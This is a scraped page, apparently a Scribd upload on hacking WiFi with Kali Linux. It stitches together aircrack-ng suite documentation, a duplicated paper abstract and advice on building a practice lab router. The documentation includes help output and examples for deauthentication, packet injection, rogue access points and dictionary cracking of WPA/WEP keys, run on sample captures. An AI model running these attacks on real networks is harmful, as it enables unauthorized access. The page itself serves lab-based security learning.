airmon-ng Usage Examples
Entering the airmon-ng command without parameters will show the interfaces status.
root@kali:~# airmon-ng PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
A number of processes can interfere with Airmon-ng. Using the check option will display any processes that might be troublesome and the check kill option will kill them for you.
root@kali:~# airmon-ng check Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 465 NetworkManager 515 dhclient 1321 wpa_supplicant root@kali:~# airmon-ng check kill Killing these processes: PID Name 515 dhclient 1321 wpa_supplicant
Enable monitor mode (start) on the given wireless interface (
wlan0
), fixed on channel . A new interface will be created (
wlan0mon
in our case), which is the interface name you will need to use in other applications.
root@kali:~# airmon-ng start wlan0 6 PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
The stop option will destroy the monitor mode interface and place the wireless interface back into managed mode.
root@kali:~# airmon-ng stop wlan0mon PHY Interface Driver Chipset phy0 wlan0mon ath9k_htc Atheros Communications, Inc. AR9271 802.11n (mac80211 station mode vif enabled on [phy0]wlan0) (mac80211 monitor mode vif disabled for [phy0]wlan0mon)
airdecap-ng
With a given ESSID (
-e test
) and password (
-p biscotte
), decrypt the specified WPA capture (
-r /usr/share/doc/aircrack-ng/examples/wpa.cap
).
root@kali:~# tcpdump -r wpa.cap reading from file wpa.cap, link-type PRISM_HEADER (802.11 plus Prism header) 03:01:06.609737 Beacon (test) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 7, PRIVACY[|802.11] 03:01:06.678714 EAPOL key (3) v1, len 95 03:01:06.678928 Acknowledgment RA:00:0d:93:eb:b0:8c (oui Unknown) 03:01:06.681525 EAPOL key (3) v1, len 119 03:01:06.681732 Acknowledgment RA:00:09:5b:91:53:5d (oui Unknown) 03:01:06.684370 EAPOL key (3) v1, len 119 03:01:06.684584 Acknowledgment RA:00:0d:93:eb:b0:8c (oui Unknown) 03:01:06.685502 EAPOL key (3) v1, len 95 03:01:06.685708 Acknowledgment RA:00:09:5b:91:53:5d (oui Unknown) 03:01:06.686775 Data IV:12000 Pad 20 KeyID 0 03:01:06.686984 Acknowledgment RA:00:0d:93:eb:b0:8c (oui Unknown) 03:01:06.688139 Data IV:12000 Pad 20 KeyID 0 03:01:06.688344 Acknowledgment RA:00:09:5b:91:53:5d (oui Unknown)
root@kali:~# airdecap-ng -e test -p biscotte wpa.cap Total number of packets read 13 Total number of WEP data packets 0 Total number of WPA data packets 2 Number of plaintext data packets 0 Number of decrypted WEP packets 0 Number of corrupted WEP packets 0 Number of decrypted WPA packets 2
root@kali:~# tcpdump -r wpa-dec.cap reading from file wpa-dec.cap, link-type EN10MB (Ethernet) 03:01:06.686775 EAPOL key (3) v1, len 127 03:01:06.688139 EAPOL key (3) v1, len 95
Packages and Binaries:
aircrack-ng
aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a 40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets have been gathered. Also it can attack WPA1/2 networks with some advanced methods or simply by brute force.
It implements the standard FMS attack along with some optimizations, thus making the attack much faster compared to other WEP cracking tools. It can also fully use a multiprocessor system to its full power in order to speed up the cracking process.
aircrack-ng is a fork of aircrack, as that project has been stopped by the upstream maintainer.
Installed size:
2.33 MB
How to install:
sudo apt install aircrack-ng
- ethtool
- hwloc
- iw
- libc6
- libgcc-s1
- libgcrypt20
- libhwloc15
- libnl-3-200
- libnl-genl-3-200
- libpcap0.8
- libpcre3
- libsqlite3-0
- libstdc++6
- python3
- rfkill
- usbutils
- wireless-tools
- zlib1g
airbase-ng
Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself
root@kali:~# airbase-ng --help Airbase-ng 1.7 - (C) 2008-2022 Thomas d'Otreppe Original work: Martin Beck https://www.aircrack-ng.org usage: airbase-ng
Options: -a bssid : set Access Point MAC address -i iface : capture packets from this interface -w WEP key : use this WEP key to en-/decrypt packets -h MAC : source mac for MITM mode -f disallow : disallow specified client MACs (default: allow) -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto) -q : quiet (do not print statistics) -v : verbose (print more messages) -A : Ad-Hoc Mode (allows other clients to peer) -Y in|out|both : external packet processing -c channel : sets the channel the AP is running on -X : hidden ESSID -s : force shared key authentication (default: auto) -S : set shared key challenge length (default: 128) -L : Caffe-Latte WEP attack (use if driver can't send frags) -N : cfrag WEP attack (recommended) -x nbpps : number of packets per second (default: 100) -y : disables responses to broadcast probes -0 : set all WPA,WEP,open tags. can't be used with -z & -Z -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 -Z type : same as -z, but for WPA2 -V type : fake EAPOL 1=MD5 2=SHA1 3=auto -F prefix : write all sent and received frames into pcap file -P : respond to all probes, even when specifying ESSIDs -I interval : sets the beacon interval value in ms -C seconds : enables beaconing of probed ESSID values (requires -P) -n hex : User specified ANonce when doing the 4-way handshake Filter options: --bssid MAC : BSSID to filter/use --bssids file : read a list of BSSIDs out of that file --client MAC : MAC of client to filter --clients file : read a list of MACs out of that file --essid ESSID : specify a single ESSID (default: default) --essids file : read a list of ESSIDs out of that file --help : Displays this usage screen
aircrack-ng
A 802.11 WEP / WPA-PSK key cracker
root@kali:~# aircrack-ng --help Aircrack-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: aircrack-ng [options] Common options: -a
: force attack mode (1/WEP, 2/WPA-PSK) -e
: target selection: network identifier -b
: target selection: access point's MAC -p
: # of CPU to use (default: all CPUs) -q : enable quiet mode (no status output) -C
: merge the given APs to a virtual one -l
: write key to file. Overwrites file. Static WEP cracking options: -c : search alpha-numeric characters only -t : search binary coded decimal chr only -h : search the numeric key for Fritz!BOX -d
: use masking of the key (A1:XX:CF:YY) -m
: MAC address to filter usable packets -n
: WEP key length : 64/128/152/256/512 -i
: WEP key index (1 to 4), default: any -f
: bruteforce fudge factor, default: 2 -k
: disable one attack method (1 to 17) -x or -x0 : disable bruteforce for last keybytes -x1 : last keybyte bruteforcing (default) -x2 : enable last 2 keybytes bruteforcing -X : disable bruteforce multithreading -y : experimental single bruteforce mode -K : use only old KoreK attacks (pre-PTW) -s : show the key in ASCII while cracking -M
: specify maximum number of IVs to use -D : WEP decloak, skips broken keystreams -P
: PTW debug: 1: disable Klein, 2: PTW -1 : run only 1 try to crack key with PTW -V : run in visual inspection mode WEP and WPA-PSK cracking options: -w
: path to wordlist(s) filename(s) -N
: path to new session filename -R
: path to existing session filename WPA-PSK options: -E
: create EWSA Project file v3 -I
: PMKID string (hashcat -m 16800) -j
: create Hashcat v3.6+ file (HCCAPX) -J
: create Hashcat file (HCCAP) -S : WPA cracking speed test -Z
: WPA cracking speed test length of execution. -r
: path to airolib-ng database (Cannot be used with -w) SIMD selection: --simd-list : Show a list of the available SIMD architectures, for this machine. --simd=
airdecap-ng
Decrypt a WEP/WPA crypted pcap file
root@kali:~# airdecap-ng --help Airdecap-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: airdecap-ng [options]Common options: -l : don't remove the 802.11 header -b
: access point MAC address filter -e
: target network SSID -o
: output file for decrypted packets (default
-dec) WEP specific option: -w
: target network WEP key in hex -c
: output file for corrupted WEP packets (default
-bad) WPA specific options: -p: target network WPA passphrase -k : WPA Pairwise Master Key in hex --help : Displays this usage screen If your capture contains any WDS packet, you must specify the -b option (otherwise only packets destined to the AP will be decrypted)
airdecloak-ng
Removes wep cloaked framed from a pcap file.
root@kali:~# airdecloak-ng -h Airdecloak-ng 1.7 - (C) 2008-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: airdecloak-ng [options] options: Mandatory: -i
: Input capture file --ssid
: ESSID of the network to filter or --bssid
: BSSID of the network to filter Optional: -o
: Output packets (valid) file (default:
-filtered.pcap) -c
: Output packets (cloaked) file (default:
-cloaked.pcap) -u
: Output packets (unknown/ignored) file (default: invalid_status.pcap) --filters
: Apply filters (separated by a comma). Filters: signal: Try to filter based on signal. duplicate_sn: Remove all duplicate sequence numbers for both the AP and the client. duplicate_sn_ap: Remove duplicate sequence number for the AP only. duplicate_sn_client: Remove duplicate sequence number for the client only. consecutive_sn: Filter based on the fact that IV should be consecutive (only for AP). duplicate_iv: Remove all duplicate IV. signal_dup_consec_sn: Use signal (if available), duplicate and consecutive sequence number (filtering is much more precise than using all these filters one by one). --null-packets : Assume that null packets can be cloaked. --disable-base_filter : Do not apply base filter. --drop-frag : Drop fragmented packets --help : Displays this usage screen
aireplay-ng
Inject packets into a wireless network to generate traffic
root@kali:~# aireplay-ng --help Aireplay-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: aireplay-ng
Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Replay options: -x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -g value : change ring buffer size (default: 8) -F : choose first matching packet Fakeauth attack options: -e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -Q : send reassociation requests -y prga : keystream for shared key auth -T n : exit after retry fake auth request n time Arp Replay attack options: -j : inject FromDS packets Fragmentation attack options: -k IP : set destination IP in fragments -l IP : set source IP in fragments Test attack options: -B : activates the bitrate test Source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file Miscellaneous options: -R : disable /dev/rtc usage --ignore-negative-one : if the interface's channel can't be determined, ignore the mismatch, needed for unpatched cfg80211 --deauth-rc rc : Deauthentication reason code [0-254] (Default: 7) Attack modes (numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0) --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --migmode : attacks WPA migration mode (-8) --test : tests injection and quality (-9) --help : Displays this usage screen
airmon-ng
POSIX sh script designed to turn wireless cards into monitor mode.
root@kali:~# airmon-ng -h usage: airmon-ng
[channel or frequency]
airodump-ng
A wireless packet capture tool for aircrack-ng
root@kali:~# airodump-ng --help Airodump-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: airodump-ng
[,
,...] Options: --ivs : Save only captured IVs --gpsd : Use GPSd --write: Dump file prefix -w : same as --write --beacons : Record all beacons in dump file --update
: Display update delay in seconds --showack : Prints ack/cts/rts statistics -h : Hides known stations for --showack -f
: Time in ms between hopping channels --berlin
: Time before removing the AP/client from the screen when no more packets are received (Default: 120 seconds) -r
: Read packets from that file -T : While reading packets from a file, simulate the arrival rate of them as if they were "live". -x
: Active Scanning Simulation --manufacturer : Display manufacturer from IEEE OUI list --uptime : Display AP Uptime from Beacon Timestamp --wps : Display WPS information (if any) --output-format
: Output format. Possible values: pcap, ivs, csv, gps, kismet, netxml, logcsv --ignore-negative-one : Removes the message that says fixed channel
: -1 --write-interval
: Output file(s) write interval in seconds --background
: Override background detection. -n
: Minimum AP packets recv'd before for displaying it Filter options: --encrypt
: Filter APs by cipher suite --netmask
: Filter APs by mask --bssid
: Filter APs by BSSID --essid
: Filter APs by ESSID --essid-regex
: Filter APs by ESSID using a regular expression -a : Filter unassociated clients By default, airodump-ng hops on 2.4GHz channels. You can make it capture on other/specific channel(s) by using: --ht20 : Set channel to HT20 (802.11n) --ht40- : Set channel to HT40- (802.11n) --ht40+ : Set channel to HT40+ (802.11n) --channel
: Capture on specific channels --band
: Band on which airodump-ng should hop -C
: Uses these frequencies in MHz to hop --cswitch
: Set channel switching method 0 : FIFO (default) 1 : Round Robin 2 : Hop on last -s : same as --cswitch --help : Displays this usage screen
airodump-ng-oui-update
IEEE oui list updater for airodump-ng
root@kali:~# man airodump-ng-oui-update AIRODUMP-NG-OUI-UPDATE(8) System Manager's Manual AIRODUMP-NG-OUI-UPDATE(8) NAME airodump-ng-oui-updater - IEEE oui list updater for airodump-ng SYNOPSIS airodump-ng-oui-updater DESCRIPTION airodump-ng-oui-updater downloads and parses IEEE OUI list. AUTHOR This manual page was written by David Francos Cuartero. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 2 or any later version pub- lished by the Free Software Foundation On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/com- mon-licenses/GPL. SEE ALSO airbase-ng(8) aireplay-ng(8) airmon-ng(8) airodump-ng(8) airserv-ng(8) airtun-ng(8) besside-ng(8) easside-ng(8) tkiptun-ng(8) wesside-ng(8) aircrack-ng(1) airdecap-ng(1) airdecloak-ng(1) airolib-ng(1) besside-ng-crawler(1) buddy-ng(1) ivstools(1) kstats(1) makeivs-ng(1) packetforge-ng(1) wpaclean(1) airventriloquist(8) Version 1.7.0 May 2022 AIRODUMP-NG-OUI-UPDATE(8)
airolib-ng
Manage and create a WPA/WPA2 pre-computed hashes tables
root@kali:~# airolib-ng -h Airolib-ng 1.7 - (C) 2007, 2008, 2009 ebfe https://www.aircrack-ng.org Usage: airolib-ng
[options] Operations: --stats : Output information about the database. --sql
: Execute specified SQL statement. --clean [all] : Clean the database from old junk. 'all' will also reduce filesize if possible and run an integrity check. --batch : Start batch-processing all combinations of ESSIDs and passwords. --verify [all] : Verify a set of randomly chosen PMKs. If 'all' is given, all invalid PMK will be deleted. --import [essid|passwd]
: Import a text file as a list of ESSIDs or passwords. --import cowpatty
: Import a cowpatty file. --export cowpatty
: Export to a cowpatty file.
airserv-ng
A wireless card server
root@kali:~# airserv-ng -h Airserv-ng 1.7 - (C) 2007, 2008, 2009 Andrea Bittau https://www.aircrack-ng.org Usage: airserv-ng
Options: -h : This help screen -p: TCP port to listen on (default:666) -d
: Wifi interface to use -c
: Channel to use -v
: Debug level (1 to 3; default: 1)
airtun-ng
A virtual tunnel interface creator for aircrack-ng
root@kali:~# airtun-ng --help Airtun-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe Original work: Martin Beck https://www.aircrack-ng.org usage: airtun-ng
-x nbpps : number of packets per second (default: 100) -a bssid : set Access Point MAC address In WDS Mode this sets the Receiver -i iface : capture packets from this interface -y file : read PRGA from this file -w wepkey : use this WEP-KEY to encrypt packets -p pass : use this WPA passphrase to decrypt packets (use with -a and -e) -e essid : target network SSID (use with -p) -t tods : send frames to AP (1) or to client (0) or tunnel them into a WDS/Bridge (2) -r file : read frames out of pcap file -h MAC : source MAC address WDS/Bridge Mode options: -s transmitter : set Transmitter MAC address for WDS Mode -b : bidirectional mode. This enables communication in Transmitter's AND Receiver's networks. Works only if you can see both stations. Repeater options: --repeat : activates repeat mode --bssid
: BSSID to repeat --netmask
: netmask for BSSID filter --help : Displays this usage screen
airventriloquist-ng
Encrypted WiFi packet injection
root@kali:~# airventriloquist-ng --help Airventriloquist-ng 1.7 - (C) 2015 Tim de Waal https://www.aircrack-ng.org usage: airventriloquist-ng [options] -i
: Interface to listen and inject on -d | --deauth : Send active deauths to encrypted stations -e | --essid
: ESSID of target network -p | --passphrase
: WPA Passphrase of target network -c | --icmp : Respond to all ICMP frames (Debug) -n | --dns : IP to resolve all DNS queries to -s | --hijack
: URL to look for in HTTP requests
can have wildcards eg: *jquery*.js* -r | --redirect
: URL to redirect to -v | --verbose : Verbose output --help : This super helpful message
besside-ng
Crack a WEP or WPA key without user intervention and collaborate with WPA cracking statistics
root@kali:~# besside-ng -h Besside-ng 1.7 - (C) 2010 Andrea Bittau https://www.aircrack-ng.org Usage: besside-ng [options]
Options: -b
Victim BSSID -R
Victim ESSID regex (requires PCRE) -s
Upload wpa.cap for cracking -c
chanlock -pflood rate -W WPA only -v verbose, -vv for more, etc. -h This help screen
besside-ng-crawler
Filter EAPOL frames from a directory of capture files.
root@kali:~# besside-ng-crawler -h Use: besside-ng-crawler
What does it do? It recurses the SearchDir directory Opens all files in there, searching for pcap-dumpfiles Filters out a single beacon and all EAPOL frames from the WPA networks in there And saves them to CapFileOut.
buddy-ng
A tool to work with easside-ng
root@kali:~# buddy-ng -h Buddy-ng 1.7 - (C) 2007,2008 Andrea Bittau https://www.aircrack-ng.org Usage: buddy-ng
Options: -h : This help screen -p : Don't drop privileges
dcrack
root@kali:~# dcrack -h Unknown cmd -h dcrack v0.3 Usage: dcrack.py [MODE] server Runs coordinator client
Runs cracker cmd
[CMD] Sends a command to server [CMD] can be: dict
cap
crack
remove
status
easside-ng
An auto-magic tool which allows you to communicate via an WEP-encrypted AP without knowing the key
root@kali:~# easside-ng -h Easside-ng 1.7 - (C) 2007, 2008, 2009 Andrea Bittau https://www.aircrack-ng.org Usage: easside-ng
Options: -h : This help screen -v
: Victim BSSID -m
: Source MAC address -i
: Source IP address -r
: Router IP address -s
: Buddy-ng IP address (mandatory) -f
: Interface to use (mandatory) -c
: Lock card to this channel -n : Determine Internet IP only
ivstools
Extract IVs from a pcap file or merges several .ivs files into one
root@kali:~# ivstools -h ivsTools 1.7 - (C) 2006-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: ivstools --convert
Extract ivs from a pcap file ivstools --merge
..
kstats
Show statistical FMS algorithm votes for an ivs dump and a specified WEP key
root@kali:~# kstats -h usage: kstats
<104-bit key>
makeivs-ng
Generate a dummy IVS dump file with a specific WEP key
root@kali:~# makeivs-ng -h makeivs-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: makeivs-ng [options] Common options: -b
: Set access point MAC address -f
: Number of first IV -k
: Target network WEP key in hex -s
: Seed used to setup random generator -w
: Filename to write IVs into -c
: Number of IVs to generate -d
: Percentage of dupe IVs -e
: Percentage of erroneous keystreams -l
: Length of keystreams -n : Ignores weak IVs -p : Uses prng algorithm to generate IVs --help : Displays this usage screen
packetforge-ng
Forge packets: ARP, UDP, ICMP or custom packets.
root@kali:~# packetforge-ng --help Packetforge-ng 1.7 - (C) 2006-2022 Thomas d'Otreppe Original work: Martin Beck https://www.aircrack-ng.org Usage: packetforge-ng
Forge options: -p
: set frame control word (hex) -a
: set Access Point MAC address -c
: set Destination MAC address -h
: set Source MAC address -j : set FromDS bit -o : clear ToDS bit -e : disables WEP encryption -k
: set Destination IP [Port] -l
: set Source IP [Port] -t ttl : set Time To Live -w
: write packet to this pcap file -s
: specify size of null packet -n: set number of packets to generate Source options: -r
: read packet from this raw file -y
: read PRGA from this file Modes: --arp : forge an ARP packet (-0) --udp : forge an UDP packet (-1) --icmp : forge an ICMP packet (-2) --null : build a null packet (-3) --custom : build a custom packet (-9) --help : Displays this usage screen
tkiptun-ng
Inject a few frames into a WPA TKIP network with QoS
root@kali:~# tkiptun-ng --help Tkiptun-ng 1.7 - (C) 2008-2022 Thomas d'Otreppe https://www.aircrack-ng.org usage: tkiptun-ng
Filter options: -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length (default: 80) -n len : maximum packet length (default: 80) -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -D : disable AP detection -Z : select packets manually Replay options: -x nbpps : number of packets per second -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -e essid : set target AP SSID -M sec : MIC error timeout in seconds [60] Debug options: -K prga : keystream for continuation -y file : keystream-file for continuation -j : inject FromDS packets -P pmk : pmk for verification/vuln testing -p psk : psk to calculate pmk with essid source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file --help : Displays this usage screen
wesside-ng
Crack a WEP key of an open network without user intervention
root@kali:~# wesside-ng -h Wesside-ng 1.7 - (C) 2007, 2008, 2009 Andrea Bittau https://www.aircrack-ng.org Usage: wesside-ng
Options: -h : This help screen -i
: Interface to use (mandatory) -m
: My IP address -n
: Network IP address -a
: Source MAC Address -c : Do not crack the key -p
: Minimum bytes of PRGA to gather -v
: Victim BSSID -t: Cracking threshold -f
: Highest scanned chan (default: 11) -k
: Ignore acks and tx txnum times
wpaclean
Clean wpa capture files
root@kali:~# wpaclean -h Usage: wpaclean
[in2.cap] [...]
airgraph-ng
airgraph-ng is a tool to create a graph ouf of the txt file created by airodump with its -w option. The graph shows the relationships between the clients and the access points.
Installed size:
106 KB
How to install:
sudo apt install airgraph-ng
- graphviz
- python3
airgraph-ng
A 802.11 visualization utility
root@kali:~# airgraph-ng -h usage: airgraph-ng [-h] [-o OUTPUT] [-i INPUT] [-g GRAPH_TYPE] [-d] Generate Client to AP Relationship (CAPR) and Common probe graph (CPG) from a airodump-ng CSV file options: -h, --help show this help message and exit -o OUTPUT, --output OUTPUT Our Output Image ie... Image.png -i INPUT, --input INPUT Airodump-ng txt file in CSV format. NOT the pcap -g GRAPH_TYPE, --graph GRAPH_TYPE Graph Type Current [CAPR (Client to AP Relationship) OR CPG (Common probe graph)] -d, --dotfile Keep the dot graph file after the export to the PNG image has been done
airodump-join
A support tool for airgraph-ng that allows you to join the airodump output files.
root@kali:~# airodump-join -h Usage: airodump-join [options] arg1 arg2 arg3 ..... Options: -h, --help show this help message and exit -o OUTPUT, --output=OUTPUT output file to write to -i FILENAME, --file=FILENAME Input files to read data from requires at least two arguments
Updated on: 2023-Aug-10
Download to read ad-free.
ad
Open navigation menu
Close suggestions
Search
Search
en
Change Language
close menu
Language
English
(selected)
Español
Português
Deutsch
Français
Русский
Italiano
Română
Bahasa Indonesia
Learn more
Upload
Loading…
User Settings
close menu
Welcome to Scribd!
Upload
Read for free
FAQ and support
Language (EN)
Sign in
Skip carousel
Carousel Previous
Carousel Next
What is Scribd?
Documents
(selected)
Explore Documents
Categories
Academic Papers
Business Templates
Court Filings
All documents
Sports & Recreation
Bodybuilding & Weight Training
Boxing
Martial Arts
Religion & Spirituality
Christianity
Judaism
New Age & Spirituality
Buddhism
Islam
Art
Music
Performing Arts
Wellness
Body, Mind, & Spirit
Weight Loss
Self-Improvement
Technology & Engineering
Politics
Political Science
All categories
How To Hack WiFi On Raspberry Pi With Kali Linux
Uploaded by
Steve Attwood
100%
(1)
100% found this document useful (1 vote)
4K views
23 pages
AI-enhanced title
Document Information
click to expand document information
Instructions on how to hack WiFi with a Raspberry Pi with the Kali Linux operating system.
Original Title
How to Hack WiFi on Raspberry Pi with Kali Linux
Copyright
© © All Rights Reserved
Share this document
Share or Embed Document
Sharing Options
Share on Facebook, opens a new window
Facebook
Share on Twitter, opens a new window
Twitter
Share on LinkedIn, opens a new window
LinkedIn
Share with Email, opens mail client
Email
Copy link
Copy link
Did you find this document useful?
100%
100% found this document useful, Mark this document as useful
0%
0% found this document not useful, Mark this document as not useful
Is this content inappropriate?
Report this Document
Save
Save How to Hack WiFi on Raspberry Pi with Kali Linux For Later
100%
(1)
100% found this document useful (1 vote)
4K views
23 pages
How To Hack WiFi On Raspberry Pi With Kali Linux
Uploaded by
Steve Attwood
AI-enhanced title
Instructions on how to hack WiFi with a Raspberry Pi with the Kali Linux operating system.
Full description
Save
Save How to Hack WiFi on Raspberry Pi with Kali Linux For Later
100%
100% found this document useful, Mark this document as useful
0%
0% found this document not useful, Mark this document as not useful
Embed
Share
Jump to Page
You are on page 1
of 23
Search inside document
Reward Your Curiosity
Everything you want to read.
Anytime. Anywhere. Any device.
No Commitment. Cancel anytime.
Share this document
Share or Embed Document
Sharing Options
Share on Facebook, opens a new window
Share on Twitter, opens a new window
Share on LinkedIn, opens a new window
Share with Email, opens mail client
Copy link
576648e32a3d8b82ca71961b7a986505
airolib-ng Usage Examples
Specify the name of the database to use (
airolib-db
) and import a file containing the ESSIDs of the network(s) you are targeting (
–import essid /root/essid.txt
). If the database does not exist, it will be created.
root@kali:~# airolib-ng airolib-db --import essid /root/essid.txt Database
does not already exist, creating it... Database
successfully created Reading file... Writing... Done.
Import any wordlists you wish to use for PMK computation.
root@kali:~# airolib-ng airolib-db --import passwd /usr/share/doc/aircrack-ng/examples/password.lst Reading file... Writing... read, 1814 invalid lines ignored. Done
Use the
–batch
to compute all PMKs.
root@kali:~# airolib-ng airolib-db --batch Computed 233 PMK in 0 seconds (233 PMK/s, 0 in buffer). All ESSID processed.
To use the airolib-ng database with aircrack-ng, use the
-r
option and specify the database name.
root@kali:~# aircrack-ng -r airolib-db /root/wpa.cap Opening /root/wpa.cap Read 13 packets. # BSSID ESSID Encryption 1 00:0D:93:EB:B0:8C test WPA (1 handshake) Choosing first network as target. Opening /root/wpa.cap Reading packets, please wait... Aircrack-ng 1.4 [00:00:00] 230/0 keys tested (106728.53 k/s) Time left: 0 seconds inf% KEY FOUND! [ biscotte ] Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE Transient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD EAPOL HMAC : 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45 Quitting aircrack-ng...
In the paper, the penetration testing software aircrack-ng tool group was used to attack the wireless network, and the wireless network password of WPA/WPA2 encryption mode was cracked in the Kali-Linux virtual experimental environment. After enumerating the operation methods of 26 uppercase and lowercase letters or 9 numbers to the n-power by using computers and password dictionaries, the WiFi password can be quickly obtained with the current high-speed development of computer hardware. This method has the advantages of simplicity, speed, stability, and high security.
In the paper, the penetration testing software aircrack-ng tool group was used to attack the wireless network, and the wireless network password of WPA/WPA2 encryption mode was cracked in the Kali-Linux virtual experimental environment. After enumerating the operation methods of 26 uppercase and lowercase letters or 9 numbers to the n-power by using computers and password dictionaries, the WiFi password can be quickly obtained with the current high-speed development of computer hardware. This method has the advantages of simplicity, speed, stability, and high security.
Tool Documentation:
Setting Up Our Practice Lab
Since we don’t want to try and hack any of our neighbors, we’ll set up a practice lab to hack into.
There is a caveat we want to mention before going further.
If you set up your actual router with a vulnerable password, you are putting your network at risk. We instead recommend finding an old router collecting dust that you can use solely for the purpose of this lab.
We also want to point out that if this router is in any way connected to your home network, it is still a vulnerable access point. You also run the risk of creating a rouge DHCP server which can cause issues with your home network.
The best scenario is a separate router not connected to the internet or any other device in your home. All we need is for it to broadcast WiFi. We will connect a single wireless device to it for testing purposes, like a cellphone, when the time is right.
We can’t walk through the setup wizard for every possible router, but they all function similarly. Check your manufacturer’s website for details on logging into the administrator controls. Usually, you connect a computer physically to the router and go to 192.168.0.1 or a similar IP address.
If your router is in a factory default state, it will likely prompt you to set up your network.
There are a few specific settings we want to prepare.
First, set any network name you want. Some recommendations include:
- Drop_it_like_its_hotspot
- Panic_at_the_Cisco
- Keep_it_on_the_download
- Wi-Fight_this_feeling
Second, choose a password from the password list we mentioned in the previous section. In our lab, we went with w0rkplac3rul3s.
Lastly, make sure the security mode is set to WPA2-Personal.
Confirm you can discover this network with other devices, and you’re ready to go.
Other Articles You Might Like
How to install Kali Linux on VirtualBox
How to Create a Virtual Hacking Lab: The Ultimate Hacker Setup
The Ultimate tcpdump Cheat Sheet: Packet Capture Made Easy
What Is Arp Spoofing and How Does It Work? A Novice’s Guide
Wireshark Cheat Sheet: All the Commands, Filters & Syntax
Best WiFi Adapters for Kali Linux
How to Use Aircrack-ng: A Guide to Network Compromise
How to Install Kali Linux on VMware: The Ultimate How-to Guide
aircrack-ng Usage Examples
WPA Wordlist Mode
Specify the wordlist to use (
-w password.lst
) and the path to the capture file (
wpa.cap
) containing at least one 4-way handshake.
root@kali:~# aircrack-ng -w password.lst wpa.cap Aircrack-ng 1.5.2 [00:00:00] 232/233 keys tested (1992.58 k/s) Time left: 0 seconds 99.57% KEY FOUND! [ biscotte ] Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE Transient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD EAPOL HMAC : 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45
Basic WEP Cracking
To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format:
root@kali:~# aircrack-ng all-ivs.ivs Aircrack-ng 1.4 [00:00:00] Tested 1514 keys (got 30566 IVs) KB depth byte(vote) 0 0/ 9 1F(39680) 4E(38400) 14(37376) 5C(37376) 9D(37376) 1 7/ 9 64(36608) 3E(36352) 34(36096) 46(36096) BA(36096) 2 0/ 1 1F(46592) 6E(38400) 81(37376) 79(36864) AD(36864) 3 0/ 3 1F(40960) 15(38656) 7B(38400) BB(37888) 5C(37632) 4 0/ 7 1F(39168) 23(38144) 97(37120) 59(36608) 13(36352) KEY FOUND! [ 1F:1F:1F:1F:1F ] Decrypted correctly: 100%
Before We Begin
There’s some background we need to cover before you can start hacking. This will include the necessary hardware, software, and an understanding of wireless technologies and dictionary attacks.
Required Hardware
To hack a wireless network, you need a wireless card with two features:
- Make sure your card supports monitor mode/promiscuous mode
- Make sure you card is capable of performing packet injection
